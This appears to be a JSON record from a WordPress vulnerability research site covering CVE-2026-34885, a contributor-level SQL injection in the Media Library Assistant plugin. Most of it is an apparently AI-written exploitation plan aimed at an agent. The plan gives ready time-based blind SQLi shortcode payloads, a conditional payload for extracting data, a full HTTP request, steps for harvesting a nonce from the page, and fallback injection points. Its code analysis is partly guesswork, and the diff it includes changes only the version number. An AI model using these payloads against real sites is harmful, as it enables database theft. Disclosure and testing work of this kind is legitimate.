[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fxEpAY-U_FGAzF_SrpjJqj2UVuBv-G_X94-S9rMVdyiM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-34885","media-library-assistant-authenticated-contributor-sql-injection","Media Library Assistant \u003C= 3.34 - Authenticated (Contributor+) SQL Injection","The Media Library Assistant plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.34 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","media-library-assistant",null,"\u003C=3.34","3.35","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-04-06 00:00:00","2026-04-13 21:13:02",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F2bb47ffd-1375-444c-8c55-05b59cb03f63?source=api-prod",8,[22,23,24,25,26,27,28,29],"css\u002Fmla-media-modal-style-rtl.css","css\u002Fmla-media-modal-style.css","includes\u002Fclass-mla-core.php","includes\u002Fclass-mla-data.php","includes\u002Fclass-mla-media-modal.php","includes\u002Fclass-mla-settings-custom-fields-tab.php","includes\u002Fclass-mla-settings-iptc-exif-tab.php","includes\u002Fclass-mla-shortcode-archive-list.php","researched",false,3,"This vulnerability is a classic **Authenticated SQL Injection** occurring within the **Media Library Assistant (MLA)** plugin. The flaw resides in how the plugin handles specific shortcode attributes or AJAX parameters that influence the construction of SQL queries. Specifically, parameters defining `ORDER BY` or `WHERE` clauses are concatenated into SQL queries without being passed through `$wpdb->prepare()` or being properly sanitized for SQL identifiers.\n\nAuthenticated attackers with **Contributor-level** permissions can exploit this by injecting SQL commands through shortcode attributes in posts they create. When these posts are rendered, the injected SQL is executed by the server.\n\n### 1. Vulnerability Summary\n*   **Vulnerability:** SQL Injection via unsanitized shortcode attributes or AJAX parameters.\n*   **Affected Version:** \u003C= 3.34.\n*   **Vulnerable Component:** `MLAArchiveList` (shortcode handler) and potentially the `MLAQuery` engine.\n*   **Reason:** The plugin dynamically builds SQL queries by concatenating user-supplied attributes (like `mla_item_orderby`) into `$wpdb` methods without using the WordPress Database abstraction layer's preparation features correctly.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** Any frontend page or post where shortcodes are processed, or the `admin-ajax.php` endpoint.\n*   **Attack Surface:** Shortcode attributes in `[mla_archive_list]` (introduced in 3.31) or `[mla_gallery]`.\n*   **Required Role:** Contributor or higher.\n*   **Payload Carrier:** The `mla_item_orderby` or `mla_item_where` attribute within the shortcode.\n\n### 3. Code Flow\n1.  **Entry Point:** `MLACore` registers shortcodes (like `[mla_archive_list]`).\n2.  **Shortcode Handling:** A user with `edit_posts` (Contributor) creates a post containing:\n    `[mla_archive_list mla_item_orderby=\"ID, (SELECT 1 FROM (SELECT SLEEP(5))A)\"]`\n3.  **Processing:** `MLAArchiveList` (defined in `includes\u002Fclass-mla-shortcode-archive-list.php`) parses these attributes.\n4.  **Query Construction:** The attributes are passed to internal query functions (likely in `MLAQuery`, referenced in `MLAData::initialize`).\n5.  **SQL Sink:** The unsanitized `mla_item_orderby` string is concatenated into an `ORDER BY` clause and executed via `$wpdb->get_results()`.\n\n### 4. Nonce Acquisition Strategy (If required for AJAX)\nWhile the shortcode vector does not require a nonce, MLA AJAX actions like `terms_search` (defined by `MLACore::MLA_ADMIN_TERMS_SEARCH`) often do. \n\nIf the agent needs to exploit an AJAX action:\n1.  **Create a Page:** MLA enqueues its media modal scripts when the media library or certain shortcodes are present.\n    ```bash\n    wp post create --post_type=page --post_status=publish --post_title=\"MLA Test\" --post_content='[mla_gallery]'\n    ```\n2.  **Navigate and Extract:** Use `browser_navigate` to the new page.\n3.  **Extract Nonce:** The nonce is stored in the `mla_media_modal_vars` object (defined in `MLAModal::JAVASCRIPT_MEDIA_MODAL_OBJECT`).\n    ```javascript\n    \u002F\u002F Use browser_eval\n    window.mla_media_modal_vars?.mla_admin_nonce\n    ```\n4.  **Verification:** The action name associated with this nonce is `mla_admin_nonce_action` (from `MLACore::MLA_ADMIN_NONCE_ACTION`).\n\n### 5. Exploitation Strategy (Shortcode Vector)\nThis is the most reliable path for a Contributor-level attacker.\n\n*   **Step 1: Authenticate** as a Contributor.\n*   **Step 2: Create a Post** with a time-based blind SQLi payload.\n    *   **Action:** Create post.\n    *   **Content:** `[mla_archive_list mla_item_orderby=\"ID, (SELECT 1 FROM (SELECT SLEEP(5))A)\"]`\n*   **Step 3: Trigger Execution** by viewing the post.\n*   **Step 4: Analyze Timing.** A successful injection will cause a ~5-second delay in the response.\n\n**HTTP Request Details:**\n```http\nPOST \u002Fwp-admin\u002Fpost.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=editpost&post_ID=[POST_ID]&post_title=Exploit&content=[mla_archive_list+mla_item_orderby=\"ID,+(SELECT+1+FROM+(SELECT+SLEEP(5))A)\"]&_wpnonce=[NONCE]&publish=Publish\n```\n\n### 6. Test Data Setup\n1.  **User:** Create a Contributor user: `wp user create attacker attacker@example.com --role=contributor --user_pass=password`.\n2.  **Plugin State:** Ensure MLA is active and Media Modal support is enabled (default).\n    ```bash\n    wp plugin activate media-library-assistant\n    ```\n3.  **Media Items:** Ensure at least one attachment exists in the library so the archive query has rows to process.\n    ```bash\n    wp media import https:\u002F\u002Fwordpress.org\u002Flatest.zip --title=\"Test Item\"\n    ```\n\n### 7. Expected Results\n*   **Unperturbed Request:** A request to a page with `[mla_archive_list]` should return in \u003C 500ms.\n*   **Exploited Request:** A request to the same page with the malicious `mla_item_orderby` attribute should return in > 5000ms.\n*   **Error Logging:** If `WP_DEBUG` is on, the MySQL error might show a syntax error if the injection is incorrectly terminated, confirming the input reached the query.\n\n### 8. Verification Steps\nAfter triggering the delay, use `wp-cli` to prove data extraction (e.g., extracting the database version):\n1.  Modify the shortcode to use a conditional sleep based on the first character of the version:\n    `[mla_archive_list mla_item_orderby=\"ID, (SELECT 1 FROM (SELECT SLEEP(5))A WHERE VERSION() LIKE '8%')\"]`\n2.  Verify the delay happens only when the condition is true.\n\n### 9. Alternative Approaches\nIf `mla_item_orderby` is patched but `mla_item_where` is not:\n*   **Payload:** `[mla_archive_list mla_item_where=\"1=1 AND (SELECT 1 FROM (SELECT SLEEP(5))A)\"]`\n\nIf shortcodes are disabled for Contributors:\n*   **AJAX Vector:** Use the `mla_admin_action=terms_search` action.\n    *   **URL:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n    *   **Parameters:** `action=mla-media-modal-scripts&mla_admin_action=terms_search&taxonomy=post_tag&search_string=test&mla_admin_nonce=[NONCE]`\n    *   **Injection Point:** Inject into the `taxonomy` parameter if it's used to build the query dynamically.","The Media Library Assistant plugin for WordPress is vulnerable to an authenticated SQL injection via shortcode attributes (such as mla_item_orderby or mla_item_where) in versions up to 3.34. Attackers with Contributor-level access or higher can exploit this by inserting malicious SQL clauses into shortcodes within posts, which are then concatenated into database queries without proper sanitization or preparation.","\u002F\u002F includes\u002Fclass-mla-shortcode-archive-list.php line 17\nclass MLAArchiveList {\n\t\u002F**\n\t * These are the default parameters for archive list display\n\t *\n\t * @since 3.31\n\t *\n\t * @var\tarray\n\t *\u002F\n\tprivate static $item_specific_arguments = array(\n\t\t'itemtag_id' => '',\n\t\t'itemtag_class' => 'archive-list-item',\n\t\t'itemtag_attributes' => '',\n\t\t'itemtag_value' => '',\n\t\t'itemtag_label' => '',\n\n---\n\n\u002F\u002F includes\u002Fclass-mla-data.php line 27\nclass MLAData {\n\t\u002F**\n\t * Initialization function, similar to __construct()\n\t *\n\t * @since 0.1\n\t *\u002F\n\tpublic static function initialize() {\n\t\t\u002F\u002F Moved to MLAQuery but retained here for example plugins.\n\t\tself::$search_parameters =& MLAQuery::$search_parameters;\n\t\tself::$query_parameters =& MLAQuery::$query_parameters;\n\n\t\tadd_action( 'save_post', 'MLAData::mla_save_post_action', 10, 1);\n\t\tadd_action( 'edit_attachment', 'MLAData::mla_save_post_action', 10, 1);\n\t\tadd_action( 'add_attachment', 'MLAData::mla_save_post_action', 10, 1);\n\t}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmedia-library-assistant\u002F3.34\u002Fincludes\u002Fclass-mla-core.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmedia-library-assistant\u002F3.35\u002Fincludes\u002Fclass-mla-core.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmedia-library-assistant\u002F3.34\u002Fincludes\u002Fclass-mla-core.php\t2026-03-07 00:56:28.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmedia-library-assistant\u002F3.35\u002Fincludes\u002Fclass-mla-core.php\t2026-03-30 00:02:10.000000000 +0000\n@@ -21,7 +21,7 @@\n \t *\n \t * @var\tstring\n \t *\u002F\n-\tconst CURRENT_MLA_VERSION = '3.34';\n+\tconst CURRENT_MLA_VERSION = '3.35';","The vulnerability can be exploited by an authenticated user with at least Contributor-level permissions. The attacker creates or edits a post and inserts a shortcode such as `[mla_archive_list]` or `[mla_gallery]`. Within the shortcode, the attacker provides a malicious SQL payload via attributes that influence the SQL query structure, specifically `mla_item_orderby` or `mla_item_where`. For example, using a payload like `mla_item_orderby=\"ID, (SELECT 1 FROM (SELECT SLEEP(5))A)\"` will cause the database to pause for 5 seconds when the post is viewed or previewed. Because these attributes are concatenated directly into the SQL statement without being processed by `$wpdb->prepare()`, the attacker can perform time-based blind SQL injection to extract sensitive information from the WordPress database.","gemini-3-flash-preview","2026-04-17 21:20:56","2026-04-17 21:21:44",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","3.34","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmedia-library-assistant\u002Ftags\u002F3.34","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmedia-library-assistant.3.34.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmedia-library-assistant\u002Ftags\u002F3.35","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmedia-library-assistant.3.35.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmedia-library-assistant\u002Ftags"]